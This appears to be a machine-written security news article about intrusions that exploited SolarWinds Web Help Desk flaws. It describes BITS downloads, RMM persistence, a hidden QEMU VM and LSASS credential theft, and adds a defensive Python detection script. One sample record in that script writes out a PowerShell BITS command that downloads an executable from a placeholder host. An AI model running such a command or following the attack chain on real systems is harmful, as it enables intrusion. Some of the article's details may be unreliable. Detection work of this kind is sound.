Ethical Hacking News

Cybercrime Actors Exploit SolarWinds WHD Bug to Steal High-Privilege Credentials



In a recent cyberattack, malicious actors exploited vulnerabilities in the SolarWinds Web Help Desk (WHD) software to gain unauthorized access to high-privilege credentials within several organizations' IT environments. Although it has not yet been confirmed which bug the attackers used, security teams are advised to patch their WHD installations immediately and to harden against this type of attack.

  • The SolarWinds Web Help Desk (WHD) software was exploited in a recent cyberattack, allowing malicious actors to gain unauthorized access to high-privilege credentials.
  • The attackers exploited at least one of three critical vulnerabilities: CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399. These flaws allow remote code execution, letting an unauthenticated attacker execute OS commands on affected systems.
  • The most recently disclosed of them, CVE-2025-40551, is a critical untrusted-deserialization flaw that carries a 9.8 CVSS score.
  • The attackers abused the Background Intelligent Transfer Service (BITS) to download and execute payloads, a "living off the land" technique that turns legitimate, already-installed administrative tools to malicious ends.
  • The intruders also used DLL sideloading and stole credentials from LSASS memory, indicating high-privilege access to sensitive domain users and groups.
  • Security teams are advised to apply WHD patches immediately, remove unauthorized RMM tools, rotate credentials, and isolate compromised hosts to mitigate this attack.


In a recent cyberattack, malicious actors exploited vulnerabilities in the SolarWinds Web Help Desk (WHD) software to gain unauthorized access to high-privilege credentials within several organizations' IT environments. The attack, which occurred in December 2025, involved previously disclosed and newly discovered bugs in the WHD software.

According to Microsoft researchers, who are investigating the intrusions, the attackers exploited at least one of three critical vulnerabilities: CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399. These flaws allow remote code execution and can be used by an unauthenticated attacker to execute OS commands on affected systems.

The most recently disclosed vulnerability, CVE-2025-40551, is a critical untrusted-deserialization flaw rated 9.8 on the CVSS scale. The bug was reported just a week after the vendor issued a security advisory urging customers to patch it. Following that advisory, the US Cybersecurity and Infrastructure Security Agency (CISA) added the bug to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to patch the hole within three days.

SolarWinds has also patched CVE-2025-40536, a high-severity (8.1 CVSS) security-control bypass that can allow an unauthenticated attacker to reach certain restricted functionality. This one has not yet appeared in CISA's KEV catalog.

The third flaw, CVE-2025-26399, is a critical 9.8-severity vulnerability that likewise lets remote, unauthenticated attackers run commands on the host machine. SolarWinds attempted to patch it three times before the fix finally worked. The researchers noted that this vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986.

After exploiting one of the WHD bugs, the attackers had the compromised devices spawn PowerShell, which abused the Background Intelligent Transfer Service (BITS) to download and execute payloads. BITS is a built-in Windows feature for managing file transfers between machines; attackers have found a way to use it for mischief, in this case downloading and executing malware. This "living off the land" technique relies on legitimate administrative tools that are already installed on victims' machines, which makes the activity harder to distinguish from routine administration.

The attackers also downloaded and installed Zoho ManageEngine, a legitimate remote monitoring and management (RMM) product, to retain long-term remote control of the compromised system. Through that tool the intruders enumerated sensitive domain users and groups, including Domain Admins, and established reverse SSH and RDP access for persistence.

In some environments, Microsoft Defender also raised alerts on the attackers creating a scheduled task that launched a QEMU virtual machine under the SYSTEM account at startup. This effectively hid the malicious activity inside a virtualized environment, with SSH access to it exposed through port forwarding.

Furthermore, in some cases the attackers used DLL sideloading to access Windows Local Security Authority Subsystem Service (LSASS) memory and steal credentials. In one instance the activity escalated to DCSync from the original access host, indicating that high-privilege credentials were used to request password data from a domain controller.

To mitigate this attack, security teams are advised to apply the WHD patches immediately and remove public access to the admin paths. They should also scan for and evict unauthorized RMM tools, specifically ManageEngine RMM artifacts such as ToolsIQ.exe, Microsoft suggests. Additionally, it is recommended to rotate credentials, particularly those accessible to users who can reach SolarWinds Web Help Desk, and to isolate any known compromised hosts.
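As an added example (not code from the article, Microsoft or SolarWinds), the Python triage script below runs detection logic for the stages of the chain described above, PowerShell-driven BITS downloads, a scheduled task launching QEMU as SYSTEM, the ToolsIQ.exe RMM artifact and unexpected LSASS access, over constructed telemetry records. The record schema, file paths, BITS command-line patterns and the LSASS allow-list are assumptions, not a vendor's event format.

```python
"""Score constructed endpoint telemetry for the post-exploitation behaviours the
article describes. Field names, sample values, regexes and allow-list are assumptions."""
import re
from collections import defaultdict
# Command-line shapes under which PowerShell-driven BITS transfers commonly surface (assumed).
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/(transfer|addfile|resume)", re.I)
QEMU_RE = re.compile(r"qemu-system-\w+(\.exe)?", re.I)
SYSTEM_IDS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "S-1-5-18"}
LSASS_OK = {"csrss.exe", "wininit.exe", "msmpeng.exe"}  # assumed LSASS-access allow-list

def _base(r, key):  # lower-cased file name of a path-valued field ('' if absent)
    return r.get(key, "").rsplit("\\", 1)[-1].lower()

def bits_from_powershell(r):  # PowerShell spawning a BITS download, as on the WHD hosts
    return (r.get("event") == "process_create" and _base(r, "image") == "powershell.exe"
            and BITS_RE.search(r.get("cmdline", "")) is not None)

def qemu_task_as_system(r):  # scheduled task starting a QEMU VM under the SYSTEM account
    return (r.get("event") == "task_create" and r.get("run_as", "").upper() in SYSTEM_IDS
            and QEMU_RE.search(r.get("action", "")) is not None)

def toolsiq_artifact(r):  # ManageEngine RMM artifact named in Microsoft's guidance
    return r.get("event") in {"process_create", "file_create"} and "toolsiq.exe" in {
        _base(r, "image"), _base(r, "path")}

def lsass_access_unexpected(r):  # credential theft from LSASS by a non-allow-listed image
    return (r.get("event") == "process_access" and _base(r, "target") == "lsass.exe"
            and _base(r, "image") not in LSASS_OK)

RULES = [bits_from_powershell, qemu_task_as_system, toolsiq_artifact, lsass_access_unexpected]
def triage(records):
    """Map host -> sorted rule names that fired; hosts matching several stages go first."""
    hits = defaultdict(set)
    for r in records:
        hits[r["host"]].update(f.__name__ for f in RULES if f(r))
    return {h: sorted(v) for h, v in hits.items() if v}

# Constructed sample telemetry, not real logs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    {"host": "whd01", "event": "process_create", "image": PS,
     "cmdline": "powershell -nop -c Start-BitsTransfer -Source http://example.invalid/a -Destination C:\\Temp\\a.exe"},
    {"host": "whd01", "event": "task_create", "run_as": "NT AUTHORITY\\SYSTEM",
     "action": r"C:\ProgramData\q\qemu-system-x86_64.exe -m 2048"},
    {"host": "whd01", "event": "process_access", "image": r"C:\ProgramData\tmp\upd.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
    {"host": "fs02", "event": "file_create", "path": r"C:\Program Files\ManageEngine\ToolsIQ.exe"},
    {"host": "ws17", "event": "process_create", "image": PS, "cmdline": "powershell Get-Date"},
]
```

Running `triage(SAMPLE)` flags whd01 on three stages of the chain and fs02 on the RMM artifact alone, while the benign PowerShell on ws17 produces no hit.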



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Cybercrime-Actors-Exploit-SolarWinds-WHD-Bug-to-Steal-High-Privilege-Credentials-ehn.shtml

  • https://go.theregister.com/feed/www.theregister.com/2026/02/09/solarwinds_mystery_whd_attack/

  • https://www.newsbreak.com/news/4485164991907-someone-s-attacking-solarwinds-whd-to-steal-high-privilege-credentials-but-we-don-t-know-who-or-how

  • https://www.theregister.com/2026/02/09/solarwinds_mystery_whd_attack/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-40551

  • https://www.cvedetails.com/cve/CVE-2025-40551/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-40536

  • https://www.cvedetails.com/cve/CVE-2025-40536/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-26399

  • https://www.cvedetails.com/cve/CVE-2025-26399/

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://www.huntress.com/cybersecurity-101/topic/what-is-apt-group


  • Published: Wed Feb 18 03:09:48 2026 by llama3.2 3B Q4_K_M

© Ethical Hacking News. All rights reserved.